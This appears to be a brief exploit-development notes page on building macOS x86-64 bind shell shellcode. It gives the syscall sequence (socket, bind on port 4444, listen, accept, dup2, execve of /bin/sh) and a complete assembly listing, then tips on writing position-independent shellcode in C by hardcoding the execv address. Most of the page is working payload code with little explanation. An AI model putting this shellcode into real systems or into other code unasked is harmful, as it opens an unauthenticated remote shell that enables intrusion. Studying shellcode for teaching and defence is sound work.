Skip to main content

Bind Shell

C code for a bind shell: 

 

 

socket(2,1,0) 

 

reserve space for sockaddr_in: 

sin_len=0 (1 byte) 

sin_family=2 (1 byte) 

sin_port=4444/0x115c (2 bytes) 

sin_addr.s_addr=0 (4 bytes) 

sin_zero[8]=0 (8 bytes) 

 

bind(socket, &addr, 0x10) 

 

listen(socket,0) 

 

accept(socket,0,0) 

 

dup2(accept, i) 

 

execve("/bin/sh", 0, 0) 

 

Final: 

bits 64 

global _main 

 

_main: 

xor rsi, rsi 

mov rdx, rsi 

inc rsi 

mov rdi,rsi 

inc rdi 

push 0x61 

pop rax 

bts rax, 25 

syscall 

mov r10,rax 

 

mov rdi,r10 

push 0x10 

pop rdx 

xor rsi,rsi 

push rsi 

mov esi,0x5c110200 

push rsi 

push rsp 

pop rsi 

push 0x68 

pop rax 

bts rax,25 

syscall 

 

mov rdi,r10 

xor rsi,rsi 

push 0x6a 

pop rax 

bts rax,25 

syscall 

 

mov rdi,r10 

xor rsi,rsi 

xor rdx,rdx 

push 0x1e 

pop rax 

bts rax,25 

syscall 

mov r10,rax 

 

 

mov rdi,r10 

push 0x2 

pop rsi 

 

loop: 

push 0x5a 

pop rax 

bts rax,25 

syscall 

dec rsi 

jns loop 

 

xor rdx,rdx 

mov rdi,'/bin//sh' 

push rdx 

push rdi 

mov rdi,rsp 

xor rsi,rsi 

push 0x3b 

pop rax 

bts rax,25 

syscall 

 

Examine the shellcode: 

 

 

Write shellcode in C 

Code hardcodes function addresses. 

gcc compiler is more usable in shellcodes than clang compiler. 

PIC means avoiding referencing variables or data outside the code segment 

 

lea rdi, [rip+0x2c] and call 0x7 <dyld_stub_binder+0x100003f86> are problemic, they are outside the code segment 

 

Use char b[] = {'/','b','i','n','/','b','a','s','h',0}; to replace "/bin/bash". 

 

One issue is resolved. We still need to eliminate the call into the _stub section. 

 

Make a definition for execv and specify its address manually. 

Create our type definition, create a variable of the type, and cast a random memory address into the variable, the address is a placeholder for execv function. 

 

 

No call into _stub section any more. 

Print the address of execv, then hardcode it in the code. 

 

Fixed